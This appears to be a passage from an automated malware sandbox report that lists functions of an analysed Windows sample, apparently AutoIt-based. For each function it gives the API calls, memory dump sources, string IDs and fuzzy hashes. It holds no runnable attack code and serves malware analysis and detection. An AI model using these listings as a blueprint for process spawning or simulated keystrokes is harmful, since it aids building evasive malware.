                    Function 007A955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                      • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007A95DF
                    • GetDlgCtrlID.USER32 ref: 007A95EA
                    • GetParent.USER32 ref: 007A9606
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 007A9609
                    • GetDlgCtrlID.USER32(?), ref: 007A9612
                    • GetParent.USER32(?), ref: 007A962E
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 007A9631
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: ce4d032f2888d705574f657b631676f9f4893575ed0dfc628391bc33fc93785d
                    • Instruction ID: b173e6d14b590081fd8d49b943c647ab68e84662442f0a82ab2a9c2d6789e735
                    • Opcode Fuzzy Hash: ce4d032f2888d705574f657b631676f9f4893575ed0dfc628391bc33fc93785d
                    • Instruction Fuzzy Hash: 4D21A474D01104BBDF05AB60CC89EFEBB75EF49300F104116F962972E2DB7D9529DA20
                    Function 007A9645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32 ref: 007A9651
                    • GetClassNameW.USER32(00000000,?,00000100), ref: 007A9666
                    • _wcscmp.LIBCMT ref: 007A9678
                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007A96F3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ClassMessageNameParentSend_wcscmp
                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                    • API String ID: 1704125052-3381328864
                    • Opcode ID: ac43e97dd62af9090e699721052502fea2614cdebbfe092318c6d02c47ca5494
                    • Instruction ID: bf71c48d9247deb53078dd23ab69c56f3758d00ea6d6471590a6af07cb3bed9c
                    • Opcode Fuzzy Hash: ac43e97dd62af9090e699721052502fea2614cdebbfe092318c6d02c47ca5494
                    • Instruction Fuzzy Hash: 4A112977248307FAFA112621DC0BDE6779CDF46770F204226FB15E50D2FEAE69205958
                    Function 007B4189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                    Download Yara Rule
                    APIs
                    • __swprintf.LIBCMT ref: 007B419D
                    • __swprintf.LIBCMT ref: 007B41AA
                      • Part of subcall function 007738D8: __woutput_l.LIBCMT ref: 00773931
                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 007B41D4
                    • LoadResource.KERNEL32(?,00000000), ref: 007B41E0
                    • LockResource.KERNEL32(00000000), ref: 007B41ED
                    • FindResourceW.KERNEL32(?,?,00000003), ref: 007B420D
                    • LoadResource.KERNEL32(?,00000000), ref: 007B421F
                    • SizeofResource.KERNEL32(?,00000000), ref: 007B422E
                    • LockResource.KERNEL32(?), ref: 007B423A
                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 007B429B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                    • String ID:
                    • API String ID: 1433390588-0
                    • Opcode ID: 4c5de2c86a035ea123ef7fb2805734fb57b9d271842e54d63b64ce08024e59ac
                    • Instruction ID: 2ae77b4dbed4755789f0c56a71048ce745354da3ce1cb21ede51acd0314912be
                    • Opcode Fuzzy Hash: 4c5de2c86a035ea123ef7fb2805734fb57b9d271842e54d63b64ce08024e59ac
                    • Instruction Fuzzy Hash: FE319271A0521AABDB119FA0DC48EFF7BBDFF08341F008529F906D6152E738DA519BA4
                    Function 0075FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                    Download Yara Rule
                    APIs
                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0075FC06
                    • OleUninitialize.OLE32(?,00000000), ref: 0075FCA5
                    • UnregisterHotKey.USER32(?), ref: 0075FDFC
                    • DestroyWindow.USER32(?), ref: 00794A00
                    • FreeLibrary.KERNEL32(?), ref: 00794A65
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00794A92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                    • String ID: close all
                    • API String ID: 469580280-3243417748
                    • Opcode ID: 0fb74260a12bd529fff45e2aa4a5355cfa1e4779d522de27e1c2a3d87aeab2f4
                    • Instruction ID: 1482d2b7ab27142e979d61e7afd37bef1cb22b7e68837d1a223b61546660cdae
                    • Opcode Fuzzy Hash: 0fb74260a12bd529fff45e2aa4a5355cfa1e4779d522de27e1c2a3d87aeab2f4
                    • Instruction Fuzzy Hash: 04A19E70701212CFCB29EF14D899EA9F764EF04701F1482ADE90AAB251DB78ED16CF94
                    Function 007C9428 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$_memset
                    • String ID: ,,~$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                    • API String ID: 2862541840-1439926319
                    • Opcode ID: 758dc4965228de58e727be0fa58a2b71ed3dbaf06e3230ef0e4807792b9d3acd
                    • Instruction ID: 526f02aa8883b03e9f5b3ebd566efc704cafb0ce3aa34b1a6847b213bb67cccb
                    • Opcode Fuzzy Hash: 758dc4965228de58e727be0fa58a2b71ed3dbaf06e3230ef0e4807792b9d3acd
                    • Instruction Fuzzy Hash: B5919D71A00219EBDF64DFA5D848FAEBBB8EF45710F10815DFA15AB280D7789905CFA0
                    Function 007AA693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                    Download Yara Rule
                    APIs
                    • EnumChildWindows.USER32(?,007AAA64), ref: 007AA9A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ChildEnumWindows
                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                    • API String ID: 3555792229-1603158881
                    • Opcode ID: fd1e4e76138677ede8a0eb250d6720a6fe00bed87d2843fba4f7fa2e03e8b63a
                    • Instruction ID: d208af2aa62b41fae6551e868608e3000be3184ee39fa27290e98e355b6a49de
                    • Opcode Fuzzy Hash: fd1e4e76138677ede8a0eb250d6720a6fe00bed87d2843fba4f7fa2e03e8b63a
                    • Instruction Fuzzy Hash: 3791B270A00606EBCF58DF70C485BEAFB74BF45340F108219D99AA7181DF387A59CB91
                    Function 00752E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                    Download Yara Rule
                    APIs
                    • SetWindowLongW.USER32(?,000000EB), ref: 00752EAE
                      • Part of subcall function 00751DB3: GetClientRect.USER32(?,?), ref: 00751DDC
                      • Part of subcall function 00751DB3: GetWindowRect.USER32(?,?), ref: 00751E1D
                      • Part of subcall function 00751DB3: ScreenToClient.USER32(?,?), ref: 00751E45
                    • GetDC.USER32 ref: 0078CF82
                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0078CF95
                    • SelectObject.GDI32(00000000,00000000), ref: 0078CFA3
                    • SelectObject.GDI32(00000000,00000000), ref: 0078CFB8
                    • ReleaseDC.USER32(?,00000000), ref: 0078CFC0
                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0078D04B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                    • String ID: U
                    • API String ID: 4009187628-3372436214
                    • Opcode ID: 29da83d3702020537df9a7555863aeb0f7092b66ad552d033f38373516a81f15
                    • Instruction ID: 1571bfc8dee5bedfa91f992124e5afb9d3ef87637551670518251c44f53cd814
                    • Opcode Fuzzy Hash: 29da83d3702020537df9a7555863aeb0f7092b66ad552d033f38373516a81f15
                    • Instruction Fuzzy Hash: 8171E531400205DFCF21EF64CC85AFA3BB5FF49311F14826AEE555A2A6D7398C56DB60
                    Function 007DC27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                      • Part of subcall function 00752344: GetCursorPos.USER32(?), ref: 00752357
                      • Part of subcall function 00752344: ScreenToClient.USER32(008167B0,?), ref: 00752374
                      • Part of subcall function 00752344: GetAsyncKeyState.USER32(00000001), ref: 00752399
                      • Part of subcall function 00752344: GetAsyncKeyState.USER32(00000002), ref: 007523A7
                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 007DC2E4
                    • ImageList_EndDrag.COMCTL32 ref: 007DC2EA
                    • ReleaseCapture.USER32 ref: 007DC2F0
                    • SetWindowTextW.USER32(?,00000000), ref: 007DC39A
                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 007DC3AD
                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 007DC48F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                    • API String ID: 1924731296-2107944366
                    • Opcode ID: b3bcd4eca16258f17c471f695982db34665047941ebec36d680e85d58dbd9d85
                    • Instruction ID: bc204e2f7c600eb746b2fcc0e283aa104ea09ca696208547b2ff7b5943c55a5e
                    • Opcode Fuzzy Hash: b3bcd4eca16258f17c471f695982db34665047941ebec36d680e85d58dbd9d85
                    • Instruction Fuzzy Hash: DE517B70204205EFD700DF24C85ABAA7BF5FF88311F04852AF996872E1DB79A959CB52
                    Function 007C8F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,007DF910), ref: 007C903D
                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,007DF910), ref: 007C9071
                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007C91EB
                    • SysFreeString.OLEAUT32(?), ref: 007C9215
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                    • String ID:
                    • API String ID: 560350794-0
                    • Opcode ID: 9d28715d209556877ffb8717301ca7b5cdcae70afdfec746eff318d7865728ce
                    • Instruction ID: 7651111cc01aac059f46ec118eb4313b66be631b3fe3e69b9a4aa68ef64af868
                    • Opcode Fuzzy Hash: 9d28715d209556877ffb8717301ca7b5cdcae70afdfec746eff318d7865728ce
                    • Instruction Fuzzy Hash: 6BF12871A00209EFDB44DF94C888EAEB7B9FF49315F14805DFA16AB250DB35AE46CB50
                    Function 007CF9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 007CF9C9
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007CFB5C
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007CFB80
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007CFBC0
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007CFBE2
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007CFD5E
                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007CFD90
                    • CloseHandle.KERNEL32(?), ref: 007CFDBF
                    • CloseHandle.KERNEL32(?), ref: 007CFE36
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                    • String ID:
                    • API String ID: 4090791747-0
                    • Opcode ID: fa0ebd2c841ed297996705e20bcf8743814deededa329c81a89e7278cf45bd5e
                    • Instruction ID: 95a25f251243c343316f0930913ed12e52de14568e8fc66f86df4eb18c0ff3f7
                    • Opcode Fuzzy Hash: fa0ebd2c841ed297996705e20bcf8743814deededa329c81a89e7278cf45bd5e
                    • Instruction Fuzzy Hash: ACE1C331204301DFCB14EF24C895F6ABBE1AF85354F14856DF89A8B2A2DB79EC45CB52
                    Function 007B4F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 007B48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007B38D3,?), ref: 007B48C7
                      • Part of subcall function 007B48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007B38D3,?), ref: 007B48E0
                      • Part of subcall function 007B4CD3: GetFileAttributesW.KERNEL32(?,007B3947), ref: 007B4CD4
                    • lstrcmpiW.KERNEL32(?,?), ref: 007B4FE2
                    • _wcscmp.LIBCMT ref: 007B4FFC
                    • MoveFileW.KERNEL32(?,?), ref: 007B5017
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                    • String ID:
                    • API String ID: 793581249-0
                    • Opcode ID: c9dbd2f23901a351d3c61536881376b0c8df8cf679bd0b2c8a523042816fae70
                    • Instruction ID: 59f7ccedfc79cf3987b540e47bb295b43ee488943b2f0976cf2a45c4635e5592
                    • Opcode Fuzzy Hash: c9dbd2f23901a351d3c61536881376b0c8df8cf679bd0b2c8a523042816fae70
                    • Instruction Fuzzy Hash: 365186B24087849BC724EB64D885ADFB7ECAF84341F00492EF589D7152EF78A18D8766
                    Function 007D88B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                    Download Yara Rule
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007D896E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: 6d75aebe451c45b75a7826016816c310e3ef4f8faaba0b6c0df8d619bc9ffc7f
                    • Instruction ID: 92a0f989e55326e50c507e5eaa4cc6d51efd2456992d4328eff861f4339a175a
                    • Opcode Fuzzy Hash: 6d75aebe451c45b75a7826016816c310e3ef4f8faaba0b6c0df8d619bc9ffc7f
                    • Instruction Fuzzy Hash: 6F51A230600204FFDB609F28CC89BA93B75FB45320F648113F956E63A1DF79A9909B92
                    Function 00752B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0078C547
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0078C569
                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0078C581
                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0078C59F
                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0078C5C0
                    • DestroyIcon.USER32(00000000), ref: 0078C5CF
                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0078C5EC
                    • DestroyIcon.USER32(?), ref: 0078C5FB
                      • Part of subcall function 007DA71E: DeleteObject.GDI32(00000000), ref: 007DA757
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                    • String ID:
                    • API String ID: 2819616528-0
                    • Opcode ID: c402be2cf640f29418db656cfb6ba073267f6d503c676decb311343f6ebf3b86
                    • Instruction ID: 0ffc50ec059b8fc528871883727acca7bb0fd7260c2008899f02ed5f166c34b4
                    • Opcode Fuzzy Hash: c402be2cf640f29418db656cfb6ba073267f6d503c676decb311343f6ebf3b86
                    • Instruction Fuzzy Hash: 71517AB0640209EFDB24DF24CC45FAA3BB5FB45311F104529F942A72A1EBB8ED95DB60
                    Function 007A9B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 007AAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 007AAE77
                      • Part of subcall function 007AAE57: GetCurrentThreadId.KERNEL32 ref: 007AAE7E
                      • Part of subcall function 007AAE57: AttachThreadInput.USER32(00000000,?,007A9B65,?,00000001), ref: 007AAE85
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 007A9B70
                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007A9B8D
                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 007A9B90
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 007A9B99
                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 007A9BB7
                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007A9BBA
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 007A9BC3
                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007A9BDA
                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007A9BDD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                    • String ID:
                    • API String ID: 2014098862-0
                    • Opcode ID: db53e7978a27044cd75304867fd63eb54462a26f1a22173dd16f1afae1d139e4
                    • Instruction ID: cf14262256795cfbc26b9c3e536398cbb2dee16b0485c6a34e9096fc22d74882
                    • Opcode Fuzzy Hash: db53e7978a27044cd75304867fd63eb54462a26f1a22173dd16f1afae1d139e4
                    • Instruction Fuzzy Hash: 9011E1B1650218FEF7106B60DC8EF6A3B2DEB4D751F104426F345AB0A0CAF75C10DAA8
                    Function 007A8E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,007A8A84,00000B00,?,?), ref: 007A8E0C
                    • HeapAlloc.KERNEL32(00000000,?,007A8A84,00000B00,?,?), ref: 007A8E13
                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,007A8A84,00000B00,?,?), ref: 007A8E28
                    • GetCurrentProcess.KERNEL32(?,00000000,?,007A8A84,00000B00,?,?), ref: 007A8E30
                    • DuplicateHandle.KERNEL32(00000000,?,007A8A84,00000B00,?,?), ref: 007A8E33
                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,007A8A84,00000B00,?,?), ref: 007A8E43
                    • GetCurrentProcess.KERNEL32(007A8A84,00000000,?,007A8A84,00000B00,?,?), ref: 007A8E4B
                    • DuplicateHandle.KERNEL32(00000000,?,007A8A84,00000B00,?,?), ref: 007A8E4E
                    • CreateThread.KERNEL32(00000000,00000000,007A8E74,00000000,00000000,00000000), ref: 007A8E68
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
